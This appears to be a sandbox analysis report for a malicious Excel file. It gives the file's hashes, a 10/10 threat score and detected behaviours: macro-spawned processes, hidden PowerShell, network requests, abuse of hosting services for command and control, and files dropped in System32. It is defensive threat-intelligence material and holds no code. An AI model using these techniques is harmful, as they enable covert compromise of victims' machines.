Extracted

• • Target

    fca38bbe2ae4512d5245a3d53392185bd425e7045c6fdd72a2928c1e5ec8e036.xls

  • Size

    869KB

  • MD5

    22100d6799cce6677b27c5adedc37555

  • SHA1

    ab6e115fb8de52dce34a26b384780c730bb1c0bf

  • SHA256

    fca38bbe2ae4512d5245a3d53392185bd425e7045c6fdd72a2928c1e5ec8e036

  • SHA512

    a78943a97ca87c20a0da4380da617ca3248399fc9b00a101886f08972696606309fa8962cc3b66ff7dd8daefb2ba20572fa5401b7764e4ee7fc25d87d7bffdcb

  • SSDEEP

    12288:1lBjmzHJE+CzldDD3DERnLRmF8DaJhuBU3LLQDC7SGooNnlix9I:TByczlVbARM8uoU3nQ4xiH

  Score

  10^/10

  defense_evasiondiscoveryexecution

  • Process spawned unexpected child process

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request

  • Command and Scripting Interpreter: PowerShell

    Run Powershell and hide display window.

    execution

  • Evasion via Device Credential Deployment

    defense_evasionexecution

  • Legitimate hosting services abused for malware hosting/C2

  • Drops file in System32 directory

  behavioral1behavioral2